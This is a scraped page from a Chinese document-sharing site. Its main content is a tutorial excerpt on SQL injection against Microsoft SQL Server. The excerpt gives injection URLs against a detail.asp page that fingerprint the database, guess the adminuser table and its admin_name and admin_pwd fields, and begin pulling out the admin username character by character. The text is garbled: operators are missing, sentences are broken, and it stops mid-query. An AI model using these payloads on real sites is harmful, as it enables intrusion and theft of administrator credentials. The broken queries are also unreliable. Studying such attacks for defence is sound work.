- 1、本文档共5页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
SQL注入攻击实例MS_SQL_Server
实例——注入攻击SQL Server
第1步:加单引号/detail.asp?productid=392后面加一个单引号,按Enter键后,服务器返回的错误提示加单引号and 1=1”。如图6.3所示,在浏览器地址栏中/ detail.asp? productid=392后面加“and 1=1”,按Enter键后,服务器返回正常页面and 1=1”
第3步:测试“and 1=2”。如图6.4所示,在浏览器地址栏中/ detail.asp?productid=392后面加“and 1=2”,按Enter键后,服务器返回错误提示and 1=2”
如果一个网站不可以注入:显示
第4步:判断数据库类型/detail.asp?productid=392后面加“and user0”,按Enter键后,服务器返回错误提示QL Server数据库and user0”
如果是SQL Server数据库,那么网址页面与/detail.asp? productid=392”是一样的,如图6.6所示。
使用下面的语句:
/detail.asp?productid=392 and (select count(*) from sysobjects)0
如果是SQL Server数据库,由于找不到表msysobjects,服务器返回错误提示对象名msysobjects无效。,程序有容错,服务器返回页面也与原页面不同使用下面的语句:
/ReadNews.asp?NewsID=294 and (select count(*) from msysobjects)0,服务器返回错误提示不能读取记录;在msysobjects上没有读取数据权限。SQL Server数据库使用下面的语句:
/ReadNews.asp?NewsID=294 and (select count(*) from sysobjects)0,服务器返回错误提示表名网站进行的测试。
如图6.10所示,在浏览器地址栏中/detail.asp?productid=392后面加“and (select count(*) from admin)=0”,按Enter键后,服务器返回错误提示admin”表。
图6.10 猜测表名失败
继续猜测表名,如图6.11所示,在/detail.asp?productid=392后面加“and (select count(*) from adminuser)=0”,返回正常页面,adminuser”表,猜测成功。
注意,猜测表名时也可以使用如下形式:
/detail.asp?productid=392 and exists(select * from admin)
/detail.asp?productid=392 and exists(select * from adminuser)
第6步:猜测字段名猜出表名后,将ount(*)替换成ount(字段名,用同样的猜解字段名。
/detail.asp?productid=392后面加“and exists (select count(name) from adminuser)=0”,按Enter键后,服务器返回错误提示name”用户名字段字段名字段名/detail.asp?productid=392后面加“and (select count(admin_name) from adminuser)=0”,返回正常页面admin_name”用户名字段名猜测字段名/detail.asp?productid=392 and (select count(admin_pwd) from adminuser)=0返回正常页面字段猜测成功字段名admin_pwd”。
第7步:猜测用户名已知表adminuser中存在admin_name字段,下面ASCII逐字解码法用户名。
首先,猜测用户名的长度/detail.asp?productid=392后面加“and (select top 1 len(admin_name) from adminuser)11”,含义是取第一条记录,测试用户名长度返回正常页面,用户名的长度用户名长度长度/detail.asp?productid=392后面加“and (select top 1 len(admin_name) from adminuser)12”,返回页面,用户名的长度用户名的长度用户名长度得到admin_name的长度,用unicode(substring(admin_name, N, 1))第N位字符ASCII码,比如:productid=392 and (select top 1 unicode(substring(admin_name, 1, 1)) from ad
您可能关注的文档
- PTFE基三层复合材料的摩擦学性能分析.doc
- SAP 设置周期性作业的方法.docx
- SAP2000计算体会(地铁).doc
- SAPEM应用推进上海石化信息化建设.doc
- SAP MM模块采购管理操作手册.doc
- SAP成本核算步骤简介.doc
- SARADC调研报告.doc
- SAS主成分分析.docx
- SATWE软件计算结果分析.doc
- SAS软件及其应用.doc
- 叽里呱啦级别1-级别6英语单词汇总.docx
- 合作意向书Letter_Of_Intent(最新文档).doc
- 员工入职手册范本(通用20篇).pdf
- 2024(最新版)人教版语文一年级上册第四单元教案汉语拼音(2024新教材).pdf
- 2024最新人教版语文一年级上册第八单元阅读教案(2024新教材).pdf
- 2024-2025(最新版)人教版语文一年级上册第一单元教案(2024秋部编新教材).pdf
- 2024(最新版)语文一年级上册第六单元识字教案(2024新人教版教材).docx
- (最新人教版)语文一年级上册第七单元阅读教案(2024新教材).pdf
- 2024-2025(最新)人教版语文一年级上册第三单元教案汉语拼音(2024部编新教材).docx
- (2024最新版)语文一年级上册第八单元阅读教案(人教版新教材).docx
最近下载
- 江苏省宿迁市2024届高三下学期三模试题 地理 Word版含答案.docx
- 中医基础理论完整.pptx VIP
- 《11.3.2 多边形的内角和》课件(3套).ppt
- 3.2《用气球驱动小车》教学设计.docx
- 2024年秋季新人教版八年级上册物理课件 5.5跨学科实践:制作望远镜.pptx
- 第十三章 电磁感应与电磁波初步 学情分析 内容与价值分析 单元小结--高二上学期物理人教版(2019)必修第三册.docx
- 湘科版科学五年级上册全册教案(含反思) .pdf
- 冀少版七年级上册生物全册新质教学课件(配2024年秋改版教材).pptx
- 2024年新人教版八年级上册物理教学课件 5.5 跨学科实践:制作望远镜.pptx
- DA98B用户手册_V2.01.pdf
文档评论(0)